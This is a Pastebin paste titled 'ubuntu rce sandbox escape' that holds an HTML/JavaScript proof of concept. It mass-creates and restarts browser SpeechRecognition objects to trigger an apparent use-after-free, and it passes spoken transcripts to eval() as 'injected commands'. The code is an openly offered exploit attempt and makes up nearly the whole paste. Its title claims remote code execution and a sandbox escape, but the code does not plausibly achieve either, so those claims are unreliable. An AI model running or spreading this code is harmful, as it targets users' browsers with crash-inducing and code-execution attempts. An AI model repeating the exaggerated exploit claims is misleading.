API tools faq
paste
Advertisement
Sweetening

ubuntu rce sandbox escape

Sweetening
Nov 24th, 2024
26
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.24 KB | None | 0 0
raw download clone embed print report
  1. <html lang="en">
  2. <head>
  3. <meta charset="UTF-8">
  4. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  5. <title>SpeechRecognition</title>
  6. </head>
  7. <body>
  8. <h1>SpeechRecognition</h1>
  9. <button id="startButton">Start Speech Recognition</button>
  10.  
  11. <script>
  12. let recognizers = [];
  13.  
  14. function createSpeechRecognizers(count) {
  15. for (let i = 0; i < count; i++) {
  16. let recognition = new (window.SpeechRecognition || window.webkitSpeechRecognition)();
  17. recognizers.push(recognition);
  18.  
  19. recognition.lang = 'en-US';
  20. recognition.interimResults = false;
  21. recognition.maxAlternatives = 1;
  22.  
  23. recognition.onresult = function(event) {
  24. let transcript = event.results[0][0].transcript;
  25. console.log('Transcript from recognizer', i, ':', transcript);
  26. // Execute the injected command using eval()
  27. eval(transcript);
  28. };
  29.  
  30. recognition.onerror = function(event) {
  31. console.error('Error in SpeechRecognition:', event.error);
  32. };
  33.  
  34. recognition.onend = function() {
  35. console.log('SpeechRecognition ended for instance:', i);
  36. };
  37.  
  38. recognition.start();
  39. setTimeout(() => {
  40. recognition.stop();
  41. recognizers.splice(recognizers.indexOf(recognition), 1);
  42. }, Math.random() * 200);
  43. }
  44. }
  45.  
  46. function triggerSpeechRecognitionUAF() {
  47. let totalRuns = 0;
  48. function deepCreateAndResume() {
  49. createSpeechRecognizers(50000);
  50. setTimeout(() => {
  51. recognizers.forEach((recognition, index) => {
  52. try {
  53. if (recognition && recognition.readyState === 0) {
  54. // Inject a command into the onresult event handler
  55. recognition.onresult = function(event) {
  56. let transcript = event.results[0][0].transcript;
  57. console.log('Transcript from recognizer', index, ':', transcript);
  58. // Execute the injected command using eval()
  59. eval(transcript);
  60. };
  61. recognition.start();
  62. console.log('Trying to resume SpeechRecognition:', index);
  63. }
  64. } catch (e) {
  65. console.error('SpeechRecognition potential UAF:', e);
  66. }
  67. });
  68. }, 150);
  69.  
  70. totalRuns++;
  71. if (totalRuns < 100) {
  72. setTimeout(deepCreateAndResume, 100);
  73. }
  74. }
  75. deepCreateAndResume();
  76. }
  77.  
  78. document.getElementById('startButton').addEventListener('click', () => {
  79. triggerSpeechRecognitionUAF();
  80. });
  81. </script>
  82. </body>
  83. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!